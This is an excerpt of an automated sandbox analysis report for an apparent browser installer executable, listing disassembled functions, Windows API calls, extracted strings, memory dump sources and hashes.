                                                                                                                        • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                        • Instruction Fuzzy Hash: E221033B6042859FEB22CFB9C844B7A7BE9BF05260F1C506DD8068BA41D730E845D7E0
                                                                                                                        Function 008F8780 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1546 8f8780-8f8784 call 8f8860 1548 8f8789-8f8793 1546->1548 1549 8f8795-8f87a9 GetCurrentProcess IsWow64Process 1548->1549 1550 8f87b0-8f87b2 1548->1550 1551 8f87ab 1549->1551 1552 8f87c5 1549->1552 1553 8f87cf-8f87d1 1550->1553 1554 8f87b4-8f87ba 1550->1554 1551->1550 1552->1553 1555 8f87c0-8f87c4 1553->1555 1554->1555
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F8860: TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                          • Part of subcall function 008F8860: ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8795
                                                                                                                        • IsWow64Process.KERNEL32(00000000,00963608,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F87A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2898688079-0
                                                                                                                        • Opcode ID: f48b8ce734d54e639aa5da29c3ac7c3f7fa19f84a788e743279905de76b2e5cb
                                                                                                                        • Instruction ID: 7c035fa9bce86e51af4e3fef935bf965d3334887a7988398e174a7e9be745e61
                                                                                                                        • Opcode Fuzzy Hash: f48b8ce734d54e639aa5da29c3ac7c3f7fa19f84a788e743279905de76b2e5cb
                                                                                                                        • Instruction Fuzzy Hash: B0E0D832A15228BBC710ABB9ED47B253698F701BA5F148124EA04D33B8DFA1DC0067D4
                                                                                                                        Function 008F8860 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1556 8f8860-8f8871 TryAcquireSRWLockExclusive 1557 8f887d-8f8884 1556->1557 1558 8f8873-8f8878 call 8e6680 1556->1558 1560 8f8897-8f88b2 call 8f8710 ReleaseSRWLockExclusive 1557->1560 1561 8f8886-8f888b call 8f8690 1557->1561 1558->1557 1565 8f8890 1561->1565 1565->1560
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1678258262-0
                                                                                                                        • Opcode ID: b6289a1fa33a2bd51c91f236cc0ce09f573bad57983c9708fc7dd9f874905e1a
                                                                                                                        • Instruction ID: ee6cec03e886776a8243658c3085239624fc6e8fc6f0637d6fbc6279f58d3505
                                                                                                                        • Opcode Fuzzy Hash: b6289a1fa33a2bd51c91f236cc0ce09f573bad57983c9708fc7dd9f874905e1a
                                                                                                                        • Instruction Fuzzy Hash: 98E04F12F543989AFF203BB979097756BA4E7917D9F00C064E70DC7AD2DD450944B3A3
                                                                                                                        Function 0091E06B Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1566 91e06b-91e07f GetLastError 1567 91e081-91e089 call 91e764 1566->1567 1568 91e09b-91e0a5 call 91e7a3 1566->1568 1573 91e096 1567->1573 1574 91e08b-91e094 1567->1574 1575 91e0a7-91e0a9 1568->1575 1576 91e0ab-91e0b3 call 8fd200 1568->1576 1573->1568 1578 91e110-91e11b SetLastError 1574->1578 1575->1578 1579 91e0b8-91e0be 1576->1579 1580 91e0d1-91e0df call 91e7a3 1579->1580 1581 91e0c0-91e0cf call 91e7a3 1579->1581 1587 91e0e1-91e0ef call 91e7a3 1580->1587 1588 91e0f8-91e10d call 91e22c call 8fd100 1580->1588 1586 91e0f0-91e0f6 call 8fd100 1581->1586 1596 91e10f 1586->1596 1587->1586 1588->1596 1596->1578
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000001,?,009125CC,0086D9CE,00941354,..\..\third_party\libc++\src\include\string:1229: assertion __pos <= size() failed: string index out of bounds,00000002,?,?,?), ref: 0091E06F
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,00000005,000000FF), ref: 0091E111
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        • Opcode ID: be3a5b22c1363abc240d99546964fdfa7959b021c47ef0640b0749d70952500b
                                                                                                                        • Instruction ID: fb5a1611a77ef855dfb382f8f1fd5c7ffdf39b0cdd6c82e32dbabe8ff64b3a27
                                                                                                                        • Opcode Fuzzy Hash: be3a5b22c1363abc240d99546964fdfa7959b021c47ef0640b0749d70952500b
                                                                                                                        • Instruction Fuzzy Hash: 7611867131C31D7EE6206BB4ACC6EAB269DEB88369B140534FE19920E2EEA44C847161
                                                                                                                        Function 059A0357 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 059A03D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                        • Instruction ID: a2d5c9471bf6d96a7e0a49aaa4e29f1b2f4f8c76d50d1ce8d628e327f042b4b6
                                                                                                                        • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                        • Instruction Fuzzy Hash: 50B1C273604B02ABDB21AE65CC88BBBB7E9FF89304F140619E99986140E731F150DBF1

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0086AB50 Relevance: 82.2, APIs: 4, Strings: 42, Instructions: 1696COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WinHTTP$ Windows_NT/%lu.%lu.%lu.%lu ($%08x$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$/$/%lu.%lu.%lu.%lu$0$0$0$0$0$0$0$0.8.0$; WoW64$<$Content-Length$Cras$HTTP$HTTP status $IsWow64Process$Transfer-Encoding: chunked$WinHttpAddRequestHeaders$WinHttpConnect$WinHttpCrackUrl$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryHeaders$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetTimeouts$WinHttpWriteData$hpad$http_transport_win.cc$kernel32.dll$oW64$winhttp.dll$x86
                                                                                                                        • API String ID: 0-1811334646
                                                                                                                        • Opcode ID: f5724a93d48c58b195cced18e4b4e8a637a6ad6214c6ead0cce3242fa727523c
                                                                                                                        • Instruction ID: 1556e7237624c1f4cd105afd648f08d59812ff5ae978ae579e1b66ca2096e298
                                                                                                                        • Opcode Fuzzy Hash: f5724a93d48c58b195cced18e4b4e8a637a6ad6214c6ead0cce3242fa727523c
                                                                                                                        • Instruction Fuzzy Hash: 01E2C271A006289ADF708B64CC55BEAB775FF51308F05C1E8E589E7282DB709ECA8F51
                                                                                                                        Function 0092ECB0 Relevance: 39.4, APIs: 10, Strings: 12, Instructions: 868libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0089C6C0: OpenProcess.KERNEL32(00100451,00000000,?,008B8551,?,?), ref: 0089C6D4
                                                                                                                          • Part of subcall function 0089C6C0: GetLastError.KERNEL32 ref: 0089C6E2
                                                                                                                          • Part of subcall function 0089C6C0: SetLastError.KERNEL32(00000000), ref: 0089C6F7
                                                                                                                          • Part of subcall function 0089C6C0: GetCurrentProcess.KERNEL32 ref: 0089C701
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0092ED0F
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0092EFFA
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0092F8E7
                                                                                                                        • GetProcAddress.KERNEL32(?,NtWow64QueryInformationProcess64), ref: 0092F905
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandleLastModuleProcess$AddressCurrentInit_thread_headerOpenProc
                                                                                                                        • String ID: Failed $ GDI Handle Table Failed $ Missing$ PEB Failed $..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$NtQueryInformationProcess$NtReadVirtualMemory$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$gdi_debug_util_win.cc$ntdll.dll
                                                                                                                        • API String ID: 3776924181-20178590
                                                                                                                        • Opcode ID: b026aa1d994d4ee7849fcdf91fd3d5085894aac93f78137347de4523e77f31c6
                                                                                                                        • Instruction ID: 15339b54d8c8d1b63473d1517028febbd629fbe1e7f63176f134c9dfc6eefe64
                                                                                                                        • Opcode Fuzzy Hash: b026aa1d994d4ee7849fcdf91fd3d5085894aac93f78137347de4523e77f31c6
                                                                                                                        • Instruction Fuzzy Hash: E362D371604301ABD710DF28D8A6B2BB7E5FFC4704F04893DF9899B292E775D9058B92
                                                                                                                        Function 00844A90 Relevance: 35.7, APIs: 8, Strings: 12, Instructions: 713fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008753C0: VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        • DeleteFileW.KERNEL32(?,Executable path: ,009432B5,00000000,InstallBrowser,000004AF,?,?), ref: 00844C46
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,000004A0), ref: 00844D38
                                                                                                                        • GetLastError.KERNEL32(?,?,000004A0), ref: 00844D43
                                                                                                                        • GetLastError.KERNEL32 ref: 00844DFB
                                                                                                                        • GetLastError.KERNEL32(?,00040221,?,?,?,?,000004A0), ref: 00844EC5
                                                                                                                        • GetLastError.KERNEL32(?,?,00040221,?,?,?,?,000004A0), ref: 00844F3B
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00845107
                                                                                                                        • GetLastError.KERNEL32 ref: 008452B0
                                                                                                                        Strings
                                                                                                                        • Verification succeeded: , xrefs: 00845021
                                                                                                                        • Installation after download event isn't in signal state or installation was stopped early., xrefs: 00844D7E
                                                                                                                        • Executable path: , xrefs: 00844C1A
                                                                                                                        • Cannot lock file: , xrefs: 00844E36, 00844F07
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00845519
                                                                                                                        • Install Browser., xrefs: 00844AD5
                                                                                                                        • Module verification failed: , xrefs: 00844F76
                                                                                                                        • InstallBrowser, xrefs: 00844ABD, 00844BFB, 00844D66, 00844E1E, 00844EE8, 00844F5E, 00845009, 008452CF
                                                                                                                        • Unexpected error in CreateDelayedParamsMapping(), xrefs: 008452E7
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00845527
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00845520
                                                                                                                        • , xrefs: 00844B60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AllocDeleteFileMultipleObjectsUnothrow_t@std@@@VirtualWait__ehfuncinfo$??2@
                                                                                                                        • String ID: $..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Cannot lock file: $Executable path: $Install Browser.$InstallBrowser$Installation after download event isn't in signal state or installation was stopped early.$Module verification failed: $Unexpected error in CreateDelayedParamsMapping()$Verification succeeded:
                                                                                                                        • API String ID: 2851896732-2479545896
                                                                                                                        • Opcode ID: ae9d02663c8a920399089f496f8d652dd59e5941a054c6c5386c84f46f4327b9
                                                                                                                        • Instruction ID: 9335e57b85ab0181248da23892cbcce53cbe5c41b94c508c0e7934ab9e19291b
                                                                                                                        • Opcode Fuzzy Hash: ae9d02663c8a920399089f496f8d652dd59e5941a054c6c5386c84f46f4327b9
                                                                                                                        • Instruction Fuzzy Hash: F2528D716087859BD714EF24C841BAEB7E1FFC5704F04892DF58997282EBB0A949CB93
                                                                                                                        Function 0083C170 Relevance: 30.7, APIs: 8, Strings: 12, Instructions: 691COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000021,?), ref: 0083C28E
                                                                                                                        • GetLastError.KERNEL32(?,00000021,?), ref: 0083C2D7
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000021,?), ref: 0083C312
                                                                                                                        • GetLastError.KERNEL32(?,00000021,?), ref: 0083C34D
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0083C3DB
                                                                                                                          • Part of subcall function 0089D890: GetFileSizeEx.KERNEL32(00000000,?,?,00000000), ref: 0089D91E
                                                                                                                        • GetLastError.KERNEL32(00941354,..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at), ref: 0083C911
                                                                                                                        Strings
                                                                                                                        • Invalid ASN1 format of certificate table in , xrefs: 0083C56D, 0083C87B
                                                                                                                        • ExtractTagFromFakeCertificate, xrefs: 0083C2A8, 0083C3F5, 0083C554, 0083C862
                                                                                                                        • ReadAllBytesFromFile, xrefs: 0083C2F2, 0083C32D, 0083C368
                                                                                                                        • Failed to read file , xrefs: 0083C40E
                                                                                                                        • Failed to read all bytes of , xrefs: 0083C346
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 0083C8FB
                                                                                                                        • Can't open file , xrefs: 0083C381
                                                                                                                        • Failed to find certificate table in , xrefs: 0083C2C1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0083CB05
                                                                                                                        • Failed to get length of , xrefs: 0083C30B
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 0083C902
                                                                                                                        • ..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 0083CAFB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileSize
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$Can't open file $ExtractTagFromFakeCertificate$Failed to find certificate table in $Failed to get length of $Failed to read all bytes of $Failed to read file $Invalid ASN1 format of certificate table in $ReadAllBytesFromFile
                                                                                                                        • API String ID: 3064237074-3678735519
                                                                                                                        • Opcode ID: 118b7b246ecd9ec8b23b9145d764a0295ab01dfd36457fd6b44060f3ac060668
                                                                                                                        • Instruction ID: 73199f6bc3709eb53366578b834b66cf68936760744a3a91efad1bd775e5d03a
                                                                                                                        • Opcode Fuzzy Hash: 118b7b246ecd9ec8b23b9145d764a0295ab01dfd36457fd6b44060f3ac060668
                                                                                                                        • Instruction Fuzzy Hash: 2F4294716083519FCB14DF24D891A6EB7A1FFD4748F44891CF986E7241EB70AA4ACBC2
                                                                                                                        Function 008E8E20 Relevance: 25.3, APIs: 13, Strings: 1, Instructions: 751COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E8DE1,?,?,009423BD,?), ref: 008E8E9B
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,008E8DE1,?), ref: 008E9314
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E8DE1,?,?,009423BD,?), ref: 008E8ED0
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 17069307-2456940119
                                                                                                                        • Opcode ID: 32f2f7251f8b50e07f1b2351a2d848a143270270b57831fefce8a49ca93afb05
                                                                                                                        • Instruction ID: f5aea6a0f6dca5918fdd8f4950ea2f82e91e6c7fcf02153ee83927553d17ce82
                                                                                                                        • Opcode Fuzzy Hash: 32f2f7251f8b50e07f1b2351a2d848a143270270b57831fefce8a49ca93afb05
                                                                                                                        • Instruction Fuzzy Hash: 6262CE716047419FD718CF2AC884B6AB7E1FF86318F19896CE98A8B391D771EC45CB81
                                                                                                                        Function 0086C530 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 431windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 0086C552
                                                                                                                        • GetModuleHandleW.KERNEL32(winhttp.dll), ref: 0086C579
